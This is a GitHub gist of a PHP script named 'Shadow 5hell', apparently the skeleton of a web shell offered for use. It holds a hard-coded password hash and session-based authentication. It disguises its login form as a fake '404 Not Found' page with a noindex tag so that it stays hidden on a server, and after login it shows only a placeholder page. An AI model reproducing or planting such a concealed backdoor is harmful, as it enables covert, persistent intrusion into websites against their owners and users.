Last active
February 17, 2022 05:01
-
-
Save Cvar1984/927b2cb513aa3ecb2d428bf27939df6b to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Shadow 5hell | |
| * | |
| * @category Seucurity | |
| * | |
| * @package Shadow | |
| * | |
| * @author Cvar1984 <[email protected]> | |
| * | |
| * @license WTFPL http://www.wtfpl.net/txt/copying/ | |
| * | |
| * @link https://github.com/Cvar1984 | |
| */ | |
| $email = ''; | |
| $password = '$2y$10$.WwaTEc/a4WSxMr0GZZypOSqkiwkia.fIlxGEIYM/Yw4a1WKo0H9G'; | |
| $serverIp = $_SERVER['SERVER_ADDR']; | |
| $sessionName = bin2hex($_SERVER["HTTP_HOST"]) . $password; | |
| $sessionKey = sha1(getClientIp()) ? : $password; | |
| session_start(); | |
| /* --------------------------- function definition -------------------------- */ | |
| /** | |
| * Login function contain html form in it | |
| * | |
| * @return void | |
| */ | |
| function login() | |
| { | |
| global $password, $sessionName, $sessionKey; | |
| if (isset($_POST['pass'])) { | |
| $gpass = $_POST["pass"]; | |
| $sessionAuth = ''; | |
| $_SESSION[$sessionName] = &$sessionAuth; | |
| if (password_verify($gpass, $password)) { | |
| $sessionAuth = $sessionKey; | |
| } | |
| } | |
| header('HTTP/1.1 404 Not Found'); | |
| echo <<<EOF | |
| <!DOCTYPE HTML> | |
| <html> | |
| <head> | |
| <title>404 Not Found</title> | |
| <meta name="robots" content="noindex;nofollow" /> | |
| </head> | |
| <body> | |
| <form method="POST" onsubmit="return true"> | |
| <input name="pass" /> | |
| <input type="submit" /> | |
| </form> | |
| </body> | |
| </html> | |
| EOF; | |
| exit; | |
| } | |
| /** | |
| * Logout function, destroy and cleanup session | |
| * | |
| * @return void | |
| */ | |
| function logout() | |
| { | |
| session_unset(); | |
| session_destroy(); | |
| } | |
| /** | |
| * Get client ip address, return false when client ip can't be found | |
| * | |
| * @return string|bool | |
| */ | |
| function getClientIp() | |
| { | |
| if (isset($_SERVER['HTTP_CLIENT_IP'])) { | |
| $ipaddress = $_SERVER['HTTP_CLIENT_IP']; | |
| } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { | |
| $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']; | |
| } elseif (isset($_SERVER['HTTP_X_FORWARDED'])) { | |
| $ipaddress = $_SERVER['HTTP_X_FORWARDED']; | |
| } elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) { | |
| $ipaddress = $_SERVER['HTTP_FORWARDED_FOR']; | |
| } elseif (isset($_SERVER['HTTP_FORWARDED'])) { | |
| $ipaddress = $_SERVER['HTTP_FORWARDED']; | |
| } elseif (isset($_SERVER['REMOTE_ADDR'])) { | |
| $ipaddress = $_SERVER['REMOTE_ADDR']; | |
| } else { | |
| $ipaddress = false; | |
| } | |
| return $ipaddress; | |
| } | |
| /* ------------------------------ end fundtion ------------------------------ */ | |
| /* ---------------------------------- auth --------------------------------- */ | |
| if (!isset($_SESSION[$sessionName])) { | |
| login(); | |
| } | |
| if ($_SESSION[$sessionName] !== $sessionKey) { | |
| login(); | |
| } | |
| /* -------------------------------- loged in -------------------------------- */ | |
| echo <<<EOF | |
| <!DOCTYPE HTML> | |
| <html> | |
| <head> | |
| <title>404 Not Found</title> | |
| <meta name="robots" content="noindex;nofollow" /> | |
| <meta charset="utf-8" /> | |
| <meta name="viewport" content="width=device-width, initial-scale=1.0" /> | |
| <link rel="shortcut icon" href="https://cvar1984.github.io/favicon.png" /> | |
| </head> | |
| <body> | |
| EOF; | |
| echo <<<EOF | |
| <div class="konten"> | |
| <h1>Anjaymabar</h1> | |
| </div> | |
| EOF; | |
| echo <<<EOF | |
| </body> | |
| </html> | |
| EOF; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment